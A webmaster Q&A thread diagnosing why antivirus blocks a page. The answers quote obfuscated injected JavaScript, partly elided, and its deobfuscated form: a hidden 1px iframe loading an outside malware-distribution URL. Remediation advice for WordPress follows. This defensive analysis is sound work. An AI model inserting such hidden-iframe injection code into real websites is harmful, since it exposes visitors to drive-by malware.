2

My client reports that [this page][1] I designed is blocked by his antivirus (Norton) : . The rest of the website is not blocked. Do you have any idea why Norton would block this page ? The report says "web attack: mass injection website 5".

John Conde
  • 86,255
  • 27
  • 146
  • 241
drake035
  • 185
  • 3

3 Answers3

3

There is definetively some JavaScript embedded in that page that looks fishy. It is a js that is obfuscated by being put as numbers in an array.

Excerpt reproduced below:

<script type="text/javascript" language="javascript"
>
try{window.document.body++}catch(gdsgsdg){dbshre=242;}if(dbshre){asd=0;
try{d=document.createElement("div");d.innerHTML.a="asd";}catch(agdsg){asd=1;}if(!asd)
{e=eval;}ss=String;asgq=new Array(31,94,110,104,94,107,97,104,104,27,31,33,25,117,8,1,24,25,26,27,109,89,107,26,101,109,107,100, [....] 23,117,6,4,120,32,32,34,53);s="";for(i=0;i-494!=0;i++){if((020==0x10)&&window.document)s+=ss["fromCharCode"](1*asgq[i]-(i%5-5-4));}z=s;e(s);}</script>      <script type="text/javascript" src="http://intlwellness.com/wp-content/themes/intlwellness/jquery.validate.min.js"></script>

So if you haven't put it there, the site is somehow compromised.

EDIT: If you were to execute the above code in its entirety then it would generate and execute the following JavaScript:

(function () {
    var jvskl = document.createElement('iframe');

    jvskl.src = 'http://archiwumprasy.com/clk.php';
    jvskl.style.position = 'absolute';
    jvskl.style.border = '0';
    jvskl.style.height = '1px';
    jvskl.style.width = '1px';
    jvskl.style.left = '1px';
    jvskl.style.top = '1px';

    if (!document.getElementById('jvskl')) {
        document.write('<div id=\'jvskl\'></div>');
        document.getElementById('jvskl').appendChild(jvskl);
    }
})();

Which, as you can see, creates a hidden iframe that loads a malicious URL. That particular URL is known for distributing malware, however it does appear to be benign currently.

MrWhite
  • 42,784
  • 4
  • 49
  • 90
Free Radical
  • 774
  • 7
  • 26
  • Weird, I didn't see that code. There must be something server side that decides when to send that code to the browser. – ZippyV Jan 06 '13 at 19:03
  • For what it is worth, I downloaded the page with curl, not with a browser. – Free Radical Jan 06 '13 at 19:07
  • Out of curiosity, I've added the unobfuscated version of the injected code to the answer, to see what it actually does. – MrWhite Jan 08 '13 at 20:30
  • 1
    @w3d. Thanks for spending the time unobfuscating it and adding it to my answer! Very educational. – Free Radical Jan 08 '13 at 20:36
  • Thanks a lot w3d and Gisle Hannemyr. It's scary to learn that people can add code stuff to my pages through forms! But how can I fix the problem now? – drake035 Jan 08 '13 at 22:54
  • Securing a website against injection attacks is a big subject and oddly enough, searching did not give me anything relevant here (here=WebMasters.SE). You maybe want to ask about this in a separate question. Here is something to get you started: http://www.webmastersessions.com/how-to-secure-your-website-sql-injection - but note that SQL injection is only one of many attack vectors. – Free Radical Jan 10 '13 at 14:12
1

probably someone injected malicious js code in the page. but checking with google it doesn't seem that there are anything: http://www.google.com/safebrowsing/diagnostic?site=http://intlwellness.com/

Benjamin
  • 121
  • 3
  • Although the last time Google checked the site was on 2012-12-30, so maybe something happened in the last week? – MrWhite Jan 06 '13 at 19:03
  • 1
    Or there is a check on the server-side to not send harmful js code when a Google bot visits. – ZippyV Jan 06 '13 at 19:08
  • Wow but how could anybody "inject" code in my page? I mean you need FTP access for that no? How to fix the problem? Is it enough to re-upload the page? – drake035 Jan 07 '13 at 18:35
  • no because if you reupload it without fixing the problem you will face the same problems again in future. could you please upload the page (original not with the malware) on mediafire and link it here? i will check it. – Benjamin Jan 07 '13 at 22:14
  • Thx Benjamin, here's the link: http://www.mediafire.com/?h1bdd52e519ehq8 – drake035 Jan 08 '13 at 22:51
  • ok, i checked it includes some scripts, maybe someone used them to inject malicious code on your pages, please update (if there is an update) all the scripts using the latest version, and i noticed also another thing: You use wordpress! Wordpress is full of bugs (not the latest version but the previouses one) do you installed wordpress common script as timthumb? they are easily crackable. – Benjamin Jan 09 '13 at 15:07
1

I have just experienced the same. Someone actually managed to put a bizarr action in my htaccess and at the same time then inserted a very similar code into my header.php (this was on a wordpress installation). I stripped the htaccess and removed the numbered array from the header. Then, the next day, the code was back in the header, but not in my htaccess. So I removed it from the header again, and now it seems to be gone. At least I am not blacklisted any more. For the time. (I upgraded my wordpress and installed a plugin called bulletproof security). The date on my altered header.php was not changed.

PS: Have a look at this link, and go ahead and edit your htaccess. http://perishablepress.com/5g-blacklist-2012/

John
  • 11
  • 2
  • Is there not any safe, bullet-proof way to get protection from this kind of things? – drake035 Jan 10 '13 at 11:49
  • I am afraid not. Open Source platforms are vulnerable for attackers all the time. But we can make it harder for them. rule numer one is to always backup everything. Rule number two is to use all kinds of security measures available - among them: always make sure of having the latest versions of everything. Query string and text-box injections are among the most common ways these bastards use to destroy other peoples work. – John Jan 10 '13 at 12:07
  • Maybe a Wordpress plugin that is vulnerable? – MrWhite Jan 10 '13 at 12:41
  • If you use WordPress and doesn't screen themes or plugins before deploying them, that is a possibility: http://hannemyr.com/roztr/content_show.php?id=22 – Free Radical Jan 10 '13 at 14:21